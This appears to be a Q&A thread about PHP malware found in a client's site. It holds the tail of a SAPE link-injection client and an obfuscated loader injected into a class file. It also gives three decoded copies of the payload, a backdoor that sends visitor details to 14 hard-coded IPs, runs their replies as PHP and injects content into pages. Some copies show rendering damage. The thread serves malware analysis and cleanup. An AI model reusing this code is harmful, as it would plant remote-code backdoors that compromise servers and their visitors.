// NOTE(review): debug mode appends a dump of the whole object to the page.
// SAPE_base() enables _debug for any request carrying the matching cookies.
if ($this->_debug) {
$html .= print_r($this, true);
}
return $html;
}
/**
 * Path of the local link database, stored next to this script.
 *
 * In multi-site mode the file name is prefixed with $this->_host, which the
 * base constructor may have taken from the request's Host header.
 *
 * @return string
 */
function _get_db_file() {
    $dir = dirname(__FILE__);
    if (!$this->_multi_site) {
        return $dir . '/links.db';
    }
    return $dir . '/' . $this->_host . '.links.db';
}
/**
 * Path and query string requested from the dispenser servers for link data.
 * Neither value is URL-encoded before it is placed in the query string.
 *
 * @return string
 */
function _get_dispenser_path() {
    $query = 'user=' . _SAPE_USER . '&host=' . $this->_host;
    return '/code.php?' . $query;
}
/**
 * Store the decoded link database and pick out the entries for the current
 * request URI.
 *
 * NOTE(review): the '#' printed in front of array_key_exists() in this listing
 * is most likely the page's rendering of PHP's '@' error-suppression operator.
 * As printed, '#' starts a comment and that line does not parse.
 *
 * @param mixed $data Result of unserialize() on the database contents;
 *                    load_data() passes it on without checking that it is an array.
 */
function set_data($data) {
if ($this->_ignore_case) {
// With no case argument, array_change_key_case() lower-cases the keys.
$this->_links = array_change_key_case($data);
}
else {
$this->_links = $data;
}
if (isset($this->_links['__sape_delimiter__'])) {
$this->_links_delimiter = $this->_links['__sape_delimiter__'];
}
if (isset($this->_links['__sape_charset__'])) {
$this->_sape_charset = $this->_links['__sape_charset__'];
}
else {
$this->_sape_charset = '';
}
// Links are keyed by request URI.
if (#array_key_exists($this->_request_uri, $this->_links) && is_array($this->_links[$this->_request_uri])) {
$this->_links_page = $this->_links[$this->_request_uri];
}
else {
// For a URI with no entry, the __sape_new_url__ value is used, but only for
// the service's bot or when force_show_code is set.
if (isset($this->_links['__sape_new_url__']) && strlen($this->_links['__sape_new_url__'])) {
if ($this->_is_our_bot || $this->_force_show_code) {
$this->_links_page = $this->_links['__sape_new_url__'];
}
}
}
}
}
class SAPE_context extends SAPE_base {
var $_words = array();
var $_words_page = array();
var $_user_agent = 'SAPE_Context PHP';
var $_filter_tags = array('a', 'textarea', 'select', 'script', 'style', 'label', 'noscript', 'noindex', 'button');
/**
 * PHP4-style constructor: runs the base-class setup, then loads the word
 * database immediately, so constructing the object may perform file and
 * network I/O (see load_data()).
 *
 * @param array|string|null $options Passed through unchanged to SAPE_base().
 */
function SAPE_context($options = null) {
parent::SAPE_base($options);
// Must follow the base constructor: load_data() relies on the state it sets.
$this->load_data();
}
/**
 * Within one piece of page HTML, replace the first occurrence of each sentence
 * configured for this page with its stored replacement markup, leaving the
 * contents of the tags listed in $this->_filter_tags untouched.
 *
 * Both the search sentences and the replacement markup come from
 * $this->_words_page, i.e. from the database load_data() downloads, and the
 * replacement is inserted into the page as-is.
 *
 * @param string $text HTML fragment to process.
 * @return string The processed fragment; wrapped in <sape_index> tags (plus any
 *         __sape_new_url__ value) for the bot, force_show_code or debug mode,
 *         with debug comments appended in debug mode.
 */
function replace_in_text_segment($text) {
$debug = '';
if ($this->_debug) {
$debug .= "<!-- argument for replace_in_text_segment: \r\n" . base64_encode($text) . "\r\n -->";
}
if (count($this->_words_page) > 0) {
// Initialises $source_sentence (singular); the loop below fills $source_sentences.
$source_sentence = array();
if ($this->_debug) {
$debug .= '<!-- sentences for replace: ';
}
// Turn every stored sentence into a regular expression that matches its plain text.
foreach ($this->_words_page as $n => $sentence) {
// Replace all entities with characters
// NOTE(review): as printed, each key equals its value and the ''' key does not
// parse. The keys were presumably HTML entity names that the page rendering
// decoded - TODO confirm against an unmodified copy.
$special_chars = array(
'&' => '&',
'"' => '"',
''' => '\'',
'<' => '<',
'>' => '>'
);
$sentence = strip_tags($sentence);
foreach ($special_chars as $from => $to) {
// The return value is discarded, so this loop leaves $sentence unchanged.
str_replace($from, $to, $sentence);
}
// Escape for HTML first, then for use inside a /.../ pattern.
$sentence = htmlspecialchars($sentence);
$sentence = preg_quote($sentence, '/');
$replace_array = array();
// Let each entity in the pattern match either the entity or its mapped form.
if (preg_match_all('/(&[#a-zA-Z0-9]{2,6};)/isU', $sentence, $out)) {
for ($i = 0; $i < count($out[1]); $i++) {
$unspec = $special_chars[$out[1][$i]];
$real = $out[1][$i];
$replace_array[$unspec] = $real;
}
}
foreach ($replace_array as $unspec => $real) {
$sentence = str_replace($real, '((' . $real . ')|(' . $unspec . '))', $sentence);
}
// Each space becomes a repeated alternation, so runs of whitespace also match.
$source_sentences[$n] = str_replace(' ', '((\s)|( ))+', $sentence);
if ($this->_debug) {
$debug .= $source_sentences[$n] . "\r\n\r\n";
}
}
if ($this->_debug) {
$debug .= '-->';
}
$first_part = true;
if (count($source_sentences) > 0) {
$content = '';
// Stack of currently open tags from _filter_tags; replacement is paused while it is non-empty.
$open_tags = array();
$close_tag = '';
// Walk the text in pieces split at '<'; each later piece begins with a tag name.
$part = strtok(' ' . $text, '<');
while ($part !== false) {
if (preg_match('/(?si)^(\/?[a-z0-9]+)/', $part, $matches)) {
$tag_name = strtolower($matches[1]);
if (substr($tag_name, 0, 1) == '/') {
$close_tag = substr($tag_name, 1);
if ($this->_debug) {
$debug .= '<!-- close_tag: ' . $close_tag . ' -->';
}
}
else {
$close_tag = '';
if ($this->_debug) {
$debug .= '<!-- open_tag: ' . $tag_name . ' -->';
}
}
$cnt_tags = count($open_tags);
// A closing tag that matches the innermost open filtered tag pops it off the stack.
if (($cnt_tags > 0) && ($open_tags[$cnt_tags - 1] == $close_tag)) {
array_pop($open_tags);
if ($this->_debug) {
$debug .= '<!-- ' . $tag_name . ' - deleted from open_tags -->';
}
if ($cnt_tags - 1 == 0) {
if ($this->_debug) {
$debug .= '<!-- start replacement -->';
}
}
}
if (count($open_tags) == 0) {
if (!in_array($tag_name, $this->_filter_tags)) {
// Split off the tag itself so only the text after '>' is searched.
$split_parts = explode('>', $part, 2);
if (count($split_parts) == 2) {
foreach ($source_sentences as $n => $sentence) {
if (preg_match('/' . $sentence . '/', $split_parts[1]) == 1) {
// Limit 1: only the first match is replaced. '$' is escaped so the
// replacement text is not read as a backreference.
$split_parts[1] = preg_replace('/' . $sentence . '/', str_replace('$', '\$', $this->_words_page[$n]), $split_parts[1], 1);
if ($this->_debug) {
$debug .= '<!-- ' . $sentence . ' --- ' . $this->_words_page[$n] . ' replaced -->';
}
// Each sentence is used at most once per page.
unset($source_sentences[$n]);
unset($this->_words_page[$n]);
}
}
$part = $split_parts[0] . '>' . $split_parts[1];
unset($split_parts);
}
}
else {
$open_tags[] = $tag_name;
if ($this->_debug) {
$debug .= '<!-- ' . $tag_name . ' - added to open_tags, stop replacement -->';
}
}
}
}
else {
// The piece does not start with a tag name: search all of it.
foreach ($source_sentences as $n => $sentence) {
if (preg_match('/' . $sentence . '/', $part) == 1) {
$part = preg_replace('/' . $sentence . '/', str_replace('$', '\$', $this->_words_page[$n]), $part, 1);
if ($this->_debug) {
$debug .= '<!-- ' . $sentence . ' --- ' . $this->_words_page[$n] . ' replaced -->';
}
unset($source_sentences[$n]);
unset($this->_words_page[$n]);
}
}
}
if ($this->_debug) {
$content .= $debug;
$debug = '';
}
// strtok() consumed the '<' delimiters, so every piece after the first gets one back.
if ($first_part) {
$content .= $part;
$first_part = false;
}
else {
$content .= $debug . '<' . $part;
}
unset($part);
$part = strtok('<');
}
// Drops the space that was prepended before tokenising.
$text = ltrim($content);
unset($content);
}
}
else {
if ($this->_debug) {
$debug .= '<!-- No word`s for page -->';
}
}
if ($this->_debug) {
$debug .= '<!-- END: work of replace_in_text_segment() -->';
}
if ($this->_is_our_bot || $this->_force_show_code || $this->_debug) {
$text = '<sape_index>' . $text . '</sape_index>';
if (isset($this->_words['__sape_new_url__']) && strlen($this->_words['__sape_new_url__'])) {
$text .= $this->_words['__sape_new_url__'];
}
}
if ($this->_debug) {
// List the sentences that were never found in the text.
if (count($this->_words_page) > 0) {
$text .= '<!-- Not replaced: ' . "\r\n";
foreach ($this->_words_page as $n => $value) {
$text .= $value . "\r\n\r\n";
}
$text .= '-->';
}
$text .= $debug;
}
return $text;
}
/**
 * Apply replace_in_text_segment() to a whole page: to the regions marked with
 * <sape_index> tags when the page has them, otherwise to the <body> content.
 *
 * The buffer is taken by reference and also returned, so the caller's copy of
 * the page is rewritten in place.
 *
 * @param string $buffer Full page HTML (modified in place).
 * @return string The modified buffer.
 */
function replace_in_page(&$buffer) {
if (count($this->_words_page) > 0) {
$split_content = preg_split('/(?smi)(<\/?sape_index>)/', $buffer, -1);
$cnt_parts = count($split_content);
if ($cnt_parts > 1) {
// If there is at least one sape_index pair, start working
if ($cnt_parts >= 3) {
// Odd-numbered pieces are the ones that sat between an opening and a closing marker.
for ($i = 1; $i < $cnt_parts; $i = $i + 2) {
$split_content[$i] = $this->replace_in_text_segment($split_content[$i]);
}
}
// The markers themselves were consumed by the split and are not put back here.
$buffer = implode('', $split_content);
if ($this->_debug) {
$buffer .= '<!-- Split by Sape_index cnt_parts=' . $cnt_parts . '-->';
}
}
else {
// No markers: split on the body tags, keeping them as separate elements.
$split_content = preg_split('/(?smi)(<\/?body[^>]*>)/', $buffer, -1, PREG_SPLIT_DELIM_CAPTURE);
// Exactly five pieces: head part, <body...>, content, </body>, remainder.
if (count($split_content) == 5) {
$split_content[0] = $split_content[0] . $split_content[1];
$split_content[1] = $this->replace_in_text_segment($split_content[2]);
$split_content[2] = $split_content[3] . $split_content[4];
unset($split_content[3]);
unset($split_content[4]);
$buffer = $split_content[0] . $split_content[1] . $split_content[2];
if ($this->_debug) {
$buffer .= '<!-- Split by BODY -->';
}
}
else {
if ($this->_debug) {
$buffer .= '<!-- Can`t split by BODY -->';
}
}
}
}
else {
// Nothing to replace on this page: ordinary visitors get the markers stripped,
// while the bot, force_show_code or debug mode gets __sape_new_url__ appended.
if (!$this->_is_our_bot && !$this->_force_show_code && !$this->_debug) {
$buffer = preg_replace('/(?smi)(<\/?sape_index>)/', '', $buffer);
}
else {
if (isset($this->_words['__sape_new_url__']) && strlen($this->_words['__sape_new_url__'])) {
$buffer .= $this->_words['__sape_new_url__'];
}
}
if ($this->_debug) {
$buffer .= '<!-- No word`s for page -->';
}
}
return $buffer;
}
/**
 * Path of the local word database, stored next to this script.
 *
 * In multi-site mode the file name is prefixed with $this->_host, which the
 * base constructor may have taken from the request's Host header.
 *
 * @return string
 */
function _get_db_file() {
    $dir = dirname(__FILE__);
    if (!$this->_multi_site) {
        return $dir . '/words.db';
    }
    return $dir . '/' . $this->_host . '.words.db';
}
/**
 * Path and query string requested from the dispenser servers for word data.
 * Neither value is URL-encoded before it is placed in the query string.
 *
 * @return string
 */
function _get_dispenser_path() {
    $query = 'user=' . _SAPE_USER . '&host=' . $this->_host;
    return '/code_context.php?' . $query;
}
/**
 * Store the decoded word database and pick out the entries for the current
 * request URI.
 *
 * NOTE(review): the '#' printed in front of array_key_exists() in this listing
 * is most likely the page's rendering of PHP's '@' error-suppression operator.
 * As printed, '#' starts a comment and that line does not parse.
 *
 * @param mixed $data Result of unserialize() on the database contents;
 *                    load_data() passes it on without checking that it is an array.
 */
function set_data($data) {
$this->_words = $data;
// Entries are keyed by request URI; _words_page stays empty when there is no match.
if (#array_key_exists($this->_request_uri, $this->_words) && is_array($this->_words[$this->_request_uri])) {
$this->_words_page = $this->_words[$this->_request_uri];
}
}
}
?>
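Sape is apparently a link exchange service used by a Russian-speaking botnet owner.
This backdoor appears to use the sape API to download XML and use bots to create a "context" that probably clicks links to generate illicit revenue. (Going by the listing itself, the data it fetches from the dispenser hosts is PHP-serialized, and the classes write it into the site's own pages through return_links() and replace_in_page(); nothing in the posted code visits or clicks links.)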
From a bad Google translation of sape.ru:
Sape system increases revenue and reduces the consumption of
webmasters optimizers. Venues are beginning to sell the place, not
only from the main pages, but also internal. How many pages on the
site? Let each revenue. Optimizers are buying cheap internal pages and
save on moving projects.
My Russian isn't very good, but sape.ru looks like some kind of link exchange service. And in answer to your question "Who is SAPE":
[david@archtower ~]$ whois sape.ru
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).
domain: SAPE.RU
nserver: ns1.q0.ru.
nserver: ns2.q0.ru.
nserver: ns3.q0.ru.
state: REGISTERED, DELEGATED, VERIFIED
org: LTD Sape
registrar: R01-REG-RIPN
admin-contact: https://partner.r01.ru/contact_admin.khtml
created: 2006.06.20
paid-till: 2013.06.20
free-date: 2013.07.21
source: TCI
Last updated on 2012.06.19 19:28:42 MSK
[david@archtower ~]$
Looks like it's something to automatically visit ads referral links at first glance.

Found this very strange PHP code in one of my class files. What is it?

I built a website for a client a while ago who has been having issues with it. After getting into the site files I found this at the top of one of the PHP classes:
<?php
/*ad0b18735e68b25aa9c4374221824db5_on*/ $byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb= array('8759','8776','8755','8766');$ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P= array('8569','8584','8571','8567','8586','8571','8565','8572','8587','8580','8569','8586','8575','8581','8580');$J0BQOOWj4oRnP7liN= array('7450','7449','7467','7453','7406','7404','7447','7452','7453','7451','7463','7452','7453');$UbjPmIKWlC="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";if (!function_exists("Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ")){ function Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($fmG17jH6h8R6pfvV6ODRd6K,$iot3u6fS){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 = '';foreach($fmG17jH6h8R6pfvV6ODRd6K as $seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 .= chr($seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh - $iot3u6fS);}return $AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7;}$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6 = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb,8658);$UsopvTU00NLoC = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P,8470);$D4fUhPPUiQCBxt = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($J0BQOOWj4oRnP7liN,7352);$UCUMQ98AUYryzF0tSVyD = $UsopvTU00NLoC('$kiNmYfN',$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6.'('.$D4fUhPPUiQCBxt.'($kiNmYfN));');$UCUMQ98AUYryzF0tSVyD($UbjPmIKWlC);} /*ad0b18735e68b25aa9c4374221824db5_off*/ ?>
I have no idea what it is and it's impossible to decipher. Nothing is output when you access the file directly online. Any ideas? Does it seem malicious?
If you and none of your developers have any idea where it came from then I guess you are under an attack :(. The immediate fix is to do the following,
Clean all your files.
Switch to secure FTP access immediately
Do some more research on internet about this attack and see what other actions you need to take.
You need to do it quickly since browsers like chrome and FF will notice it soon and would start showing your site as malicious to users.
You most certainly got hacked.
I had some fun poking into the code.
The code is base64-encoded multiple times and then eval'd. The result is:
// Decoded payload as posted in the answer, annotated for analysis.
// NOTE(review): the '#' printed before file_get_contents() below is most likely
// the page's rendering of PHP's '@' operator; as printed it starts a comment.
// The function_exists() guard makes the payload define itself only once per
// request, even when the same snippet is present in several included files.
if (!function_exists("GetMama")){
// mod_con: inserts the content held in $_SERVER["good"] into a page - directly
// after <body> when that tag occurs exactly once, otherwise directly before
// </body> when that occurs exactly once. The first str_ireplace() of each pair
// replaces a tag with itself and is only there to obtain the count in $cnt_h.
function mod_con($buf){
str_ireplace("<body>","<body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
return $buf;}
str_ireplace("</body>","</body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
return $buf;}
return $buf;}
// opanki: output-buffer callback. When the response headers include
// "Content-Encoding: gzip" it writes the buffer to a temporary file under /tmp,
// reads it back through gzopen/gzread (up to 10000000 bytes), injects via
// mod_con() and compresses again; otherwise it injects directly. It then sends
// a Content-Length header for the modified body.
function opanki($buf){
$gz_e = false;$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}
if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
gzclose($zd);
unlink($tmpfname);
$contents = gzencode($contents);}
else {
$contents = mod_con($buf);}
$len = strlen($contents);
header("Content-Length: ".$len);
return($contents);}
// GetMama: returns a hard-coded domain string, sent below as the "mother" parameter.
function GetMama(){
$mother = "mdrmediagroup.com";
return $mother;}
// From here on, all output of the request passes through opanki().
ob_start("opanki");
// ahfudflfzdhfhs: contacts the control server $pa over plain HTTP and acts on its reply.
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(__FILE__);
// Details collected about the infected file and the current visitor.
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];} else {
$host = "";}
if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];} else {
$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);}
else {
$ref = "";}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));}
else {
$ua = "";}
if (isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);}
else {$qs = "";}
// The request path and its parameter names are fixed strings, which makes them
// usable as a search pattern in outbound proxy or firewall logs.
$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
// Three transports are tried in order: cURL, file_get_contents, raw socket.
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;}
if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(#file_get_contents($url_0 . $url_1));
$try = false;}
if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);
$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);}
fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}}
// A reply containing "eval" is executed as PHP after the marker is removed:
// the remote server can run arbitrary code on this host, and the request ends.
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult));
eval($z);
exit();}
// A reply containing "ebna" is stored (marker removed) in $_SERVER["good"], the
// value mod_con() inserts into the page.
if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);
return true;}
else {
return false;}}
// Hard-coded list of 14 control-server addresses, tried in random order until
// one of them answers with content to inject. Useful as indicators when
// reviewing egress logs.
$father2[] = "77.81.241.253";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "31.184.234.96";$father2[] = "77.95.18.189";$father2[] = "93.170.137.22";$father2[] = "188.40.95.244";$father2[] = "199.115.231.58";$father2[] = "82.192.87.178";$father2[] = "216.246.99.215";$father2[] = "95.211.18.79";shuffle($father2);foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) { break ;}}}
Yes, it is malicious code: it's a bunch of base64-encoded strings that are eval'd, and the resulting code is:
<?php
// Decoded payload as posted in this answer, annotated for analysis. Several
// function boundaries fall in the middle of a line in this copy.
// NOTE(review): the '#' printed before file_get_contents() below is most likely
// the page's rendering of PHP's '@' operator; as printed it starts a comment.
// The guard keeps the payload from being defined twice in one request.
if (!function_exists("GetMama")){
// mod_con: puts the content of $_SERVER["good"] right after <body> when that
// tag occurs exactly once, otherwise right before </body> when that occurs
// exactly once. The self-replacing str_ireplace() calls only count occurrences.
function mod_con($buf){
str_ireplace("<body>","<body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
return $buf;
}
str_ireplace("</body>","</body>",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
// mod_con() ends on the next line and opanki() begins on it. opanki() is the
// output-buffer callback: it un-gzips the response when needed (via a temporary
// file under /tmp), injects through mod_con(), re-compresses and sets Content-Length.
return $buf;}return $buf;}function opanki($buf){
$gz_e = false;
$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) {
$gz_e = true;
}if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);
$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
gzclose($zd);unlink($tmpfname);
$contents = gzencode($contents);
} else {$contents = mod_con($buf);}
$len = strlen($contents);
header("Content-Length: ".$len);
return($contents);}
// GetMama: returns a hard-coded domain string, sent below as the "mother"
// parameter. The ob_start() on its last line routes all output through opanki().
function GetMama(){
$mother = "mdrmediagroup.com";
return $mother;}ob_start("opanki");
// ahfudflfzdhfhs: contacts the control server $pa over plain HTTP, reporting
// the infected file's path and the visitor's host header, IP address, referer,
// user agent and query string, then acts on the reply.
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(__FILE__);
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
} else {
$host = "";
}if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];
} else {$ip = "";
}if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
} else {$ref = "";}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {
$ua = "";
}if (
isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);
} else {$qs = "";}
// The request path and parameter names are fixed strings, which makes them
// usable as a search pattern in outbound proxy or firewall logs.
$url_0 = "http://" . $pa;
$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
// Transports are tried in order: cURL, file_get_contents, raw socket.
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;
} if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(#file_get_contents($url_0 . $url_1));
$try = false;
}if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";
$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);
}fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
}
// A reply containing "eval" is executed as PHP once the marker is removed, so
// the remote server can run arbitrary code on this host; the request then ends.
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult));
eval($z);
exit();
// A reply containing "ebna" is kept (marker removed) in $_SERVER["good"], the
// value mod_con() inserts into the page.
}if (strpos($ult,"ebna") !== false){
$_SERVER["good"] = str_replace("ebna","",$ult);return true;
}else {return false;}}
// Hard-coded control-server addresses, tried in random order until one replies
// with content to inject. Useful as indicators when reviewing egress logs.
$father2[] = "77.81.241.253";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "31.184.234.96";
$father2[] = "77.95.18.189";
$father2[] = "93.170.137.22";
$father2[] = "188.40.95.244";
$father2[] = "199.115.231.58";
$father2[] = "82.192.87.178";
$father2[] = "216.246.99.215";
$father2[] = "95.211.18.79";
shuffle($father2);
foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) { break ;}
}
}
?>
To expand on my comment...
Are you using a CMS (Wordpress, Joomla, etc.)? If so, some 3rd party plugin and theme developers attempt to encrypt their code so that it isn't pirated...
If you wrote the site from scratch, look down.
Are you the only developer?
(YES) --> You've been hacked. --> Check your log files. -> Look for unusual activity/hack attempts. --> Attempt to find the vulnerability and patch it. --> Remove the malicious code.
(NO) --> Ask the other developer(s) if they put it there. If the answer is no, go to the above solution.
As Khan said, time is of the essence to a certain extent, because services like Google and Web of Trust will begin to mark your site as malicious. At the same time, don't just delete the foreign code. If you manage to unravel it at a later date, you may be able to figure out what it does and who it reports to --> who the hackers are.
Also look at the server logs... If your server has been rooted, then the only way to keep the hacker out would be to reinstall it.
The code is:
// Hand-unpacked copy of the payload, annotated for analysis.
// NOTE(review): this copy differs from the other two listings on the page in
// ways that look like transcription or rendering loss rather than real
// differences: the tag strings in mod_con() are empty here (the others show
// "<body>" and "</body>"), urlencode(FILE) appears where the others have
// __FILE__, and the eval call is broken across two lines. The '#' before
// file_get_contents() is most likely the page's rendering of '@'.
// The guard keeps the payload from being defined twice in one request.
if (!function_exists("GetMama"))
{
// mod_con: inserts the content of $_SERVER["good"] into the page when the
// searched tag occurs exactly once; the self-replacing str_ireplace() calls
// only obtain the occurrence count in $cnt_h.
function mod_con($buf){
str_ireplace("","",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("","" . stripslashes($_SERVER["good"]),$buf);
return $buf;
}
str_ireplace("","",$buf,$cnt_h);
if ($cnt_h == 1) {
$buf = str_ireplace("",stripslashes($_SERVER["good"])."",$buf);
return $buf;
}
return $buf;
}
// opanki: output-buffer callback. For a gzip-encoded response it writes the
// buffer to a temporary file under /tmp, reads it back through gzopen/gzread,
// injects via mod_con() and compresses again; otherwise it injects directly.
// It then sends a Content-Length header for the modified body.
function opanki($buf){
$gz_e = false;$h_l = headers_list();
if (in_array("Content-Encoding: gzip", $h_l)) {
$gz_e = true;
}
if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");
file_put_contents($tmpfname, $buf);
$zd = gzopen($tmpfname, "r");
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
gzclose($zd);
unlink($tmpfname);
$contents = gzencode($contents);
}
else {
$contents = mod_con($buf);
}
$len = strlen($contents);
header("Content-Length: ".$len);
return($contents);
}
// GetMama: returns a hard-coded domain string, sent below as the "mother" parameter.
function GetMama(){
$mother = "mdrmediagroup.com";
return $mother;
}
// From here on, all output of the request passes through opanki().
ob_start("opanki");
// ahfudflfzdhfhs: contacts the control server $pa over plain HTTP and acts on its reply.
function ahfudflfzdhfhs($pa){
$mama = GetMama();
$file = urlencode(FILE);
// Details collected about the current visitor.
if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
} else {
$host = "";
}
if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];
}
else {
$ip = "";
}
if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
}
else {
$ref = "";
}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
}
else {
$ua = "";
}
if (isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);
}
else {
$qs = "";
}
// The request path and parameter names are fixed strings, which makes them
// usable as a search pattern in outbound proxy or firewall logs.
$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
// Transports are tried in order: cURL, file_get_contents, raw socket.
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;
}
if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(#file_get_contents($url_0 . $url_1));
$try = false;
}
if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET $url_1 HTTP/1.0\r\n";
$out .= "Host: $pa\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);
}
fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
}
// A reply containing "eval" is executed as PHP once the marker is removed, so
// the remote server can run arbitrary code on this host; the request then ends.
// (The eval call is split across the next two lines in this copy.)
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult)); e
val($z);
exit();
}
// A reply containing "ebna" is kept (marker removed) in $_SERVER["good"], the
